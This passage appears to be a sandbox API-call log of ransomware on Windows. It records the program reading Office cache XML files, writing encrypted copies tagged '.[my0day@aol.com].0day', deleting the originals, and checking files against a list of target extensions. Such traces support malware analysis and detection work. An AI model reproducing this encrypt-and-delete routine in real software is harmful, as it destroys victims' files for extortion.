(lpString="Office32WW.xml") returned 14 [0035.771] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.772] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=4274) returned 1 [0035.772] CloseHandle (hObject=0x1a0) returned 1 [0035.772] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.772] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.772] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.772] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.773] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.773] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.773] GetLastError () returned 0x0 [0035.773] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.774] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.775] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.775] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.775] SetEndOfFile (hFile=0x1b8) returned 1 [0035.776] CloseHandle (hObject=0x1b8) returned 1 [0035.776] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.776] SetEndOfFile (hFile=0x1a0) returned 1 [0035.777] CloseHandle (hObject=0x1a0) returned 1 [0035.777] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.777] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.777] lstrlenW (lpString=".doc") returned 4 [0035.777] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.777] lstrlenW (lpString=".docx") returned 5 [0035.778] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.778] lstrlenW (lpString=".pdf") returned 4 [0035.778] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString=".xls") returned 4 [0035.778] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString=".xlsx") returned 5 [0035.778] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.778] lstrlenW (lpString=".ppt") returned 4 [0035.778] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString=".zip") returned 4 [0035.778] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.778] lstrlenW (lpString=".rar") returned 4 [0035.778] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString=".bz2") returned 4 [0035.778] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString=".7z") returned 3 [0035.778] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString=".dbf") returned 4 [0035.778] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString=".1cd") returned 4 [0035.778] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString=".jpg") returned 4 [0035.778] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.778] lstrlenW (lpString=".doc") returned 4 [0035.778] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.778] lstrlenW (lpString=".docx") returned 5 [0035.778] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.778] lstrlenW (lpString=".pdf") returned 4 [0035.778] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString=".xls") returned 4 [0035.779] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString=".xlsx") returned 5 [0035.779] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.779] lstrlenW (lpString=".ppt") returned 4 [0035.779] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.779] lstrlenW (lpString=".zip") returned 4 [0035.779] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.779] lstrlenW (lpString=".rar") returned 4 [0035.779] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString=".bz2") returned 4 [0035.779] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString=".7z") returned 3 [0035.779] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.779] lstrlenW (lpString=".dbf") returned 4 [0035.779] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.779] lstrlenW (lpString=".1cd") returned 4 [0035.779] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.779] lstrlenW (lpString=".jpg") returned 4 [0035.779] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.779] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.779] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0035.779] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.780] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6421) returned 1 [0035.780] CloseHandle (hObject=0x1a0) returned 1 [0035.780] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0035.780] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.780] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.780] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.781] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.781] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.781] GetLastError () returned 0x0 [0035.781] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1915, lpOverlapped=0x0) returned 1 [0035.782] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0035.783] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.783] WriteFile (in: hFile=0x1b8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.783] SetEndOfFile (hFile=0x1b8) returned 1 [0035.783] CloseHandle (hObject=0x1b8) returned 1 [0035.784] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.784] SetEndOfFile (hFile=0x1a0) returned 1 [0035.973] CloseHandle (hObject=0x1a0) returned 1 [0035.980] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.980] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0035.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.980] lstrlenW (lpString=".doc") returned 4 [0035.980] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.980] lstrlenW (lpString=".docx") returned 5 [0035.980] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.980] lstrlenW (lpString=".pdf") returned 4 [0035.980] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.980] lstrlenW (lpString=".xls") returned 4 [0035.980] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.980] lstrlenW (lpString=".xlsx") returned 5 [0035.981] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.981] lstrlenW (lpString=".ppt") returned 4 [0035.981] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString=".zip") returned 4 [0035.981] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.981] lstrlenW (lpString=".rar") returned 4 [0035.981] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString=".bz2") returned 4 [0035.981] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString=".7z") returned 3 [0035.981] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString=".dbf") returned 4 [0035.981] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString=".1cd") returned 4 [0035.981] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString=".jpg") returned 4 [0035.981] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.981] lstrlenW (lpString=".doc") returned 4 [0035.981] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString=".docx") returned 5 [0035.981] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.981] lstrlenW (lpString=".pdf") returned 4 [0035.981] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString=".xls") returned 4 [0035.981] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.981] lstrlenW (lpString=".xlsx") returned 5 [0035.981] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.981] lstrlenW (lpString=".ppt") returned 4 [0035.982] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.982] lstrlenW (lpString=".zip") returned 4 [0035.982] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.982] lstrlenW (lpString=".rar") returned 4 [0035.982] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.982] lstrlenW (lpString=".bz2") returned 4 [0035.982] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.982] lstrlenW (lpString=".7z") returned 3 [0035.982] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.982] lstrlenW (lpString=".dbf") returned 4 [0035.982] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.982] lstrlenW (lpString=".1cd") returned 4 [0035.982] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.982] lstrlenW (lpString=".jpg") returned 4 [0035.982] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.982] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.982] lstrlenW (lpString="Setup.xml") returned 9 [0035.982] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.983] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=16683) returned 1 [0035.983] CloseHandle (hObject=0x1a0) returned 1 [0035.983] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.983] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.983] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.983] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.983] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.983] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0035.984] GetLastError () returned 0x0 [0035.984] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x412b, lpOverlapped=0x0) returned 1 [0035.985] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0035.987] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.987] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.987] SetEndOfFile (hFile=0x16c) returned 1 [0035.987] CloseHandle (hObject=0x16c) returned 1 [0035.988] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.988] SetEndOfFile (hFile=0x1a0) returned 1 [0035.989] CloseHandle (hObject=0x1a0) returned 1 [0035.989] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.989] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString=".doc") returned 4 [0035.990] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".docx") returned 5 [0035.990] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.990] lstrlenW (lpString=".pdf") returned 4 [0035.990] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".xls") returned 4 [0035.990] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".xlsx") returned 5 [0035.990] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.990] lstrlenW (lpString=".ppt") returned 4 [0035.990] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString=".zip") returned 4 [0035.990] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.990] lstrlenW (lpString=".rar") returned 4 [0035.990] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".bz2") returned 4 [0035.990] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".7z") returned 3 [0035.990] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString=".dbf") returned 4 [0035.990] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString=".1cd") returned 4 [0035.990] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.990] lstrlenW (lpString=".jpg") returned 4 [0035.991] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString=".doc") returned 4 [0035.991] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString=".docx") returned 5 [0035.991] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.991] lstrlenW (lpString=".pdf") returned 4 [0035.991] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString=".xls") returned 4 [0035.991] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString=".xlsx") returned 5 [0035.991] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.991] lstrlenW (lpString=".ppt") returned 4 [0035.991] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString=".zip") returned 4 [0035.991] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.991] lstrlenW (lpString=".rar") returned 4 [0035.991] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString=".bz2") returned 4 [0035.991] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString=".7z") returned 3 [0035.991] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString=".dbf") returned 4 [0035.991] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString=".1cd") returned 4 [0035.991] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.991] lstrlenW 